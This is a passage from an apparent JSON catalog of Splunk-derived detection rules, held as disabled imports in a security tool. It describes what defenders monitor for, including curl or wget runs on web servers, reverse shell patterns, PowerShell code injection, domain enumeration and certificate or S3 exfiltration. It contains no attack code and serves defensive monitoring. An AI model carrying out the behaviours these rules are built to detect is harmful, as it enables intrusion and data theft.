"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-execution-of-net-utilities-via-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb59cf01-1874-4d16-b7e4-54a6eb9b3118", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_execution_of__net_utilities_via_scripts.yml" } }, { "id": "splunk-security-content-eb65619c-4f8d-4383-a975-d352765d344b", "type": "detection", "name": "Java Writing JSP File", "description": "The following analytic detects the Java process writing a .jsp file to disk, which may indicate a web shell being deployed. It leverages data from the Endpoint datamodel, specifically monitoring process and filesystem activities. This activity is significant because web shells can provide attackers with remote control over the compromised server, leading to further exploitation. 
If confirmed malicious, this could allow unauthorized access, data exfiltration, or further compromise of the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/java-writing-jsp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb65619c-4f8d-4383-a975-d352765d344b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/java_writing_jsp_file.yml" } }, { "id": "splunk-security-content-ec102cb2-a0f5-11eb-9b38-acde48001122", "type": "detection", "name": "Powershell Remote Thread To Known Windows Process", "description": "The following analytic detects suspicious PowerShell processes attempting to inject code into critical Windows processes using CreateRemoteThread. It leverages Sysmon EventCode 8 to identify instances where PowerShell spawns threads in processes like svchost.exe, csrss.exe, and others. This activity is significant as it is commonly used by malware such as TrickBot and offensive tools like Cobalt Strike to execute malicious payloads, establish reverse shells, or download additional malware. 
If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remote-thread-to-known-windows-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec102cb2-a0f5-11eb-9b38-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remote_thread_to_known_windows_process.yml" } }, { "id": "splunk-security-content-ec3a9362-92fe-11eb-99d0-acde48001122", "type": "detection", "name": "AWS IAM Delete Policy", "description": "The following analytic detects the deletion of an IAM policy in AWS. It leverages AWS CloudTrail logs to identify `DeletePolicy` events, excluding those from AWS internal services. This activity is significant as unauthorized policy deletions can disrupt access controls and weaken security postures. If confirmed malicious, an attacker could remove critical security policies, potentially leading to privilege escalation, unauthorized access, or data exfiltration. 
Monitoring this behavior helps ensure that only authorized changes are made to IAM policies, maintaining the integrity and security of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-delete-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec3a9362-92fe-11eb-99d0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_delete_policy.yml" } }, { "id": "splunk-security-content-ec3b7601-689a-4463-94e0-c9f45638efb9", "type": "detection", "name": "Web Servers Executing Suspicious Processes", "description": "The following analytic detects the execution of suspicious processes on systems identified as web servers. It leverages the Splunk data model \"Endpoint.Processes\" to search for specific process names such as \"whoami\", \"ping\", \"iptables\", \"wget\", \"service\", and \"curl\". This activity is significant because these processes are often used by attackers for reconnaissance, persistence, or data exfiltration. If confirmed malicious, this could lead to data theft, deployment of additional malware, or even ransomware attacks. 
Immediate investigation is required to determine the legitimacy of the activity and mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-servers-executing-suspicious-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec3b7601-689a-4463-94e0-c9f45638efb9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/web_servers_executing_suspicious_processes.yml" } }, { "id": "splunk-security-content-ec5b6790-595a-4fb8-ad43-56e5b55a9617", "type": "detection", "name": "Windows AD Dangerous User ACL Modification", "description": "This detection monitors the addition of the following ACLs to an Active Directory user object: \"Full control\",\"All extended rights\",\"All validated writes\", \"Create all child objects\",\"Delete all child objects\",\"Delete subtree\",\"Delete\",\"Modify permissions\",\"Modify owner\",\"Write all properties\". Such modifications can indicate potential privilege escalation or malicious activity. 
Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-user-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec5b6790-595a-4fb8-ad43-56e5b55a9617", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_user_acl_modification.yml" } }, { "id": "splunk-security-content-ec99bb81-c31b-4837-8c7d-1b32aa70b337", "type": "detection", "name": "Cisco Secure Firewall - High Priority Intrusion Classification", "description": "This analytic identifies high-severity intrusion events based on the classification assigned to Snort rules within Cisco Secure Firewall logs.\nIt leverages Cisco Secure Firewall Threat Defense logs and focuses on events classified as:\n\n- A Network Trojan was Detected\n- Successful Administrator Privilege Gain\n- Successful User Privilege Gain\n- Attempt to Login By a Default Username and Password\n- Known malware command and control traffic\n- Known malicious file or file based exploit\n- Known client side exploit attempt\n- Large Scale Information Leak\n\nThese classifications typically represent significant threats such as remote code execution, credential theft, lateral movement, or malware communication. 
Detection of these classifications should be prioritized for immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1003", "T1071", "T1190", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-priority-intrusion-classification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec99bb81-c31b-4837-8c7d-1b32aa70b337", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_priority_intrusion_classification.yml" } }, { "id": "splunk-security-content-ecddae4e-3d4b-41e2-b3df-e46a88b38521", "type": "detection", "name": "Windows Suspicious Process File Path", "description": "The following analytic identifies processes running from file paths not typically associated with legitimate software. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process paths within the Endpoint data model. This activity is significant because adversaries often use unconventional file paths to execute malicious code without requiring administrative privileges. 
If confirmed malicious, this behavior could indicate an attempt to bypass security controls, leading to unauthorized software execution, potential system compromise, and further malicious activities within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ecddae4e-3d4b-41e2-b3df-e46a88b38521", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_process_file_path.yml" } }, { "id": "splunk-security-content-ed06725f-6da6-439f-9dcc-ab30e891297c", "type": "detection", "name": "Windows PowerShell Export PfxCertificate", "description": "The following analytic detects the use of the PowerShell cmdlet `export-pfxcertificate` by leveraging Script Block Logging. This activity is significant as it may indicate an adversary attempting to exfiltrate certificates from the Windows Certificate Store. Monitoring this behavior is crucial for identifying potential certificate theft, which can lead to unauthorized access and impersonation attacks. 
If confirmed malicious, this activity could allow attackers to compromise secure communications, authenticate as legitimate users, and escalate their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-export-pfxcertificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed06725f-6da6-439f-9dcc-ab30e891297c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_export_pfxcertificate.yml" } }, { "id": "splunk-security-content-ed313326-a0f9-11eb-a89c-acde48001122", "type": "detection", "name": "Wermgr Process Connecting To IP Check Web Services", "description": "The following analytic detects the wermgr.exe process attempting to connect to known IP check web services. It leverages Sysmon EventCode 22 to identify DNS queries made by wermgr.exe to specific IP check services. This activity is significant because wermgr.exe is typically used for Windows error reporting, and its connection to these services may indicate malicious code injection, often associated with malware like Trickbot. 
If confirmed malicious, this behavior could allow attackers to recon the infected machine's IP address, aiding in further exploitation and evasion tactics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-connecting-to-ip-check-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed313326-a0f9-11eb-a89c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/wermgr_process_connecting_to_ip_check_web_services.yml" } }, { "id": "splunk-security-content-ed4eeacb-8d5a-488e-bc97-1ce6ded63b84", "type": "detection", "name": "Windows Modify Registry Disable Toast Notifications", "description": "The following analytic detects modifications to the Windows registry that disable toast notifications. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled*\" with a value set to \"0x00000000\". This activity is significant because disabling toast notifications can prevent users from receiving critical system and application updates, which adversaries like Azorult exploit for defense evasion. 
If confirmed malicious, this action could allow attackers to operate undetected, leading to prolonged persistence and potential further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-toast-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed4eeacb-8d5a-488e-bc97-1ce6ded63b84", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_toast_notifications.yml" } }, { "id": "splunk-security-content-ed550c19-712e-43f6-bd19-6f58f61b3a5e", "type": "detection", "name": "GetDomainComputer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize `Get-DomainComputer` to discover remote systems. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as `Get-DomainComputer` is part of PowerView, a tool often used by adversaries for domain enumeration and situational awareness. 
If confirmed malicious, this activity could allow attackers to map out the network, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincomputer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed550c19-712e-43f6-bd19-6f58f61b3a5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincomputer_with_powershell.yml" } }, { "id": "splunk-security-content-ed76ce37-bab9-4ec0-bf3e-9c6a6cf43365", "type": "detection", "name": "Zscaler CryptoMiner Downloaded Threat Blocked", "description": "The following analytic identifies attempts to download cryptomining software that are blocked by Zscaler. It leverages web proxy logs to detect blocked actions associated with cryptominer threats, analyzing key data points such as device owner, user, URL category, destination URL, and IP. This activity is significant for a SOC as it helps in early identification and mitigation of cryptomining activities, which can compromise network integrity and resource availability. 
If confirmed malicious, this activity could lead to unauthorized use of network resources for cryptomining, potentially degrading system performance and increasing operational costs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-cryptominer-downloaded-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed76ce37-bab9-4ec0-bf3e-9c6a6cf43365", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_cryptominer_downloaded_threat_blocked.yml" } }, { "id": "splunk-security-content-edb930df-64c2-4bb7-9b5c-889ed53fb973", "type": "detection", "name": "Windows Post Exploitation Risk Behavior", "description": "The following analytic identifies four or more distinct post-exploitation behaviors on a Windows system. It leverages data from the Risk data model in Splunk Enterprise Security, focusing on multiple risk events and their associated MITRE ATT&CK tactics and techniques. This activity is significant as it indicates potential malicious actions following an initial compromise, such as persistence, privilege escalation, or data exfiltration. 
If confirmed malicious, this behavior could allow attackers to maintain control, escalate privileges, and further exploit the compromised environment, leading to significant security breaches and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1049", "T1069", "T1016", "T1003", "T1082", "T1115", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-post-exploitation-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "edb930df-64c2-4bb7-9b5c-889ed53fb973", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_post_exploitation_risk_behavior.yml" } }, { "id": "splunk-security-content-eddbf5ba-b89e-47ca-995e-2d259804e55e", "type": "detection", "name": "Windows Account Discovery for None Disable User Account", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser with the UACFilter parameter set to NOT_ACCOUNTDISABLE, indicating an attempt to enumerate Active Directory user accounts that are not disabled. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify the specific script block text. Monitoring this activity is significant as it may indicate reconnaissance efforts by an attacker to identify active user accounts for further exploitation. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-for-none-disable-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eddbf5ba-b89e-47ca-995e-2d259804e55e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_for_none_disable_user_account.yml" } }, { "id": "splunk-security-content-ee18ed37-0802-4268-9435-b3b91aaa18db", "type": "detection", "name": "PowerShell - Connect To Internet With Hidden Window", "description": "The following analytic detects PowerShell commands using the WindowStyle parameter to hide the window while connecting to the Internet. This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions that include variations of the WindowStyle parameter. This activity is significant because it attempts to bypass default PowerShell execution policies and conceal its actions, which is often indicative of malicious intent. 
If confirmed malicious, this could allow an attacker to execute commands stealthily, potentially leading to unauthorized data exfiltration or further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-connect-to-internet-with-hidden-window.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee18ed37-0802-4268-9435-b3b91aaa18db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml" } }, { "id": "splunk-security-content-ee301e1e-cd81-4011-a911-e5f049b9e3d5", "type": "detection", "name": "Windows Anonymous Pipe Activity", "description": "The following analytic detects the creation or connection of anonymous pipes for inter-process communication (IPC) within a Windows environment. Anonymous pipes are commonly used by legitimate system processes, services, and applications to transfer data between related processes. However, adversaries frequently abuse anonymous pipes to facilitate stealthy process injection, command-and-control (C2) communication, credential theft, or privilege escalation. This detection monitors for unusual anonymous pipe activity, particularly involving non-system processes, unsigned executables, or unexpected parent-child process relationships. 
While legitimate use cases exist\u2014such as Windows services, software installers, or security tools\u2014unusual or high-frequency anonymous pipe activity should be investigated for potential malware, persistence mechanisms, or lateral movement techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-anonymous-pipe-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee301e1e-cd81-4011-a911-e5f049b9e3d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_anonymous_pipe_activity.yml" } }, { "id": "splunk-security-content-ee54241e-0815-4423-9729-e1f5dfc402de", "type": "detection", "name": "Windows Excel Spawning Microsoft Project Application", "description": "The following analytic identifies the execution of uncommon Microsoft application executables as child processes of Microsoft Excel.\nUnder normal conditions, Excel primarily spawns internal Office-related processes, and the creation of executables such as WINPROJ.EXE, FOXPROW.exe, or SCHDPLUS.exe is uncommon in typical business workflows.\nAdversaries may abuse this behavior to blend malicious activity within trusted applications, execute unauthorized code, or bypass application control mechanisms.\nThis technique aligns with common tradecraft where Office applications are leveraged as initial access or execution vectors due to their prevalence in enterprise environments.\nDetecting this relationship helps defenders 
spot suspicious child processes that may indicate malware execution, persistence mechanisms, or attempts to establish command-and-control.\nSecurity teams should investigate the parent Excel process, the context of the ActivateMicrosoftApp() execution, and any subsequent network or file activity.\nWhile certain legitimate Office features could trigger this process in specific environments, its occurrence generally warrants further scrutiny to validate intent and rule out compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excel-spawning-microsoft-project-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee54241e-0815-4423-9729-e1f5dfc402de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excel_spawning_microsoft_project_application.yml" } }, { "id": "splunk-security-content-ee8b16a4-118e-4dd7-af4b-835530415610", "type": "detection", "name": "ESXi Reverse Shell Patterns", "description": "This detection looks for reverse shell string patterns on an ESXi host, which may indicate that a threat actor is attempting to establish remote control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/esxi-reverse-shell-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee8b16a4-118e-4dd7-af4b-835530415610", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_reverse_shell_patterns.yml" } }, { "id": "splunk-security-content-eeb432d6-2212-43b6-9e89-fcd753f7da4c", "type": "detection", "name": "AWS Exfiltration via Bucket Replication", "description": "The following analytic detects API calls to enable S3 bucket replication services. It leverages AWS CloudTrail logs to identify `PutBucketReplication` events, focusing on fields like `bucketName`, `ReplicationConfiguration.Rule.Destination.Bucket`, and user details. This activity is significant as it can indicate unauthorized data replication, potentially leading to data exfiltration. 
If confirmed malicious, attackers could replicate sensitive data to external accounts, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-bucket-replication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eeb432d6-2212-43b6-9e89-fcd753f7da4c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_bucket_replication.yml" } }, { "id": "splunk-security-content-eec78cef-d4c8-4b35-8f5b-6922102a4a41", "type": "detection", "name": "Linux Auditd Virtual Disk File And Directory Discovery", "description": "The following analytic detects suspicious discovery of virtual disk files and directories, which may indicate an attacker's attempt to locate and access virtualized storage environments. Virtual disks can contain sensitive data or critical system configurations, and unauthorized discovery attempts could signify preparatory actions for data exfiltration or further compromise. 
By monitoring for unusual or unauthorized searches for virtual disk files and directories, this analytic helps identify potential reconnaissance activities, enabling security teams to respond promptly and safeguard against unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-virtual-disk-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eec78cef-d4c8-4b35-8f5b-6922102a4a41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_virtual_disk_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-ef3c5ef2-3f6d-4087-aa75-49bf746dc907", "type": "detection", "name": "Windows WMI Process And Service List", "description": "The following analytic identifies suspicious WMI command lines querying for running processes or services. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process and command-line events. This activity is significant as adversaries often use WMI to gather system information and identify services on compromised machines. 
If confirmed malicious, this behavior could allow attackers to map out the system, identify critical services, and plan further attacks, potentially leading to privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-process-and-service-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ef3c5ef2-3f6d-4087-aa75-49bf746dc907", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_process_and_service_list.yml" } }, { "id": "splunk-security-content-ef4c3f20-d1ad-4ad1-a3f4-d5f391c005fe", "type": "detection", "name": "O365 Multiple Service Principals Created by SP", "description": "The following analytic identifies instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe. It leverages O365 logs from the Unified Audit Log, focusing on the 'Add service principal' operation in the Office 365 Azure Active Directory environment. This activity is significant as it may indicate a compromised or malicious service principal attempting to expand control or access within the network. 
If confirmed malicious, this could lead to unauthorized access and potential lateral movement within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-service-principals-created-by-sp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ef4c3f20-d1ad-4ad1-a3f4-d5f391c005fe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_service_principals_created_by_sp.yml" } }, { "id": "splunk-security-content-efbcf8ee-bc75-47f1-8985-a5c638c4faf0", "type": "detection", "name": "Windows MSHTA Writing to World Writable Path", "description": "The following analytic identifies instances of `mshta.exe` writing files to world-writable directories. It leverages Sysmon EventCode 11 logs to detect file write operations by `mshta.exe` to directories like `C:\\Windows\\Tasks` and `C:\\Windows\\Temp`. This activity is significant as it often indicates an attempt to establish persistence or execute malicious code, deviating from the utility's legitimate use. 
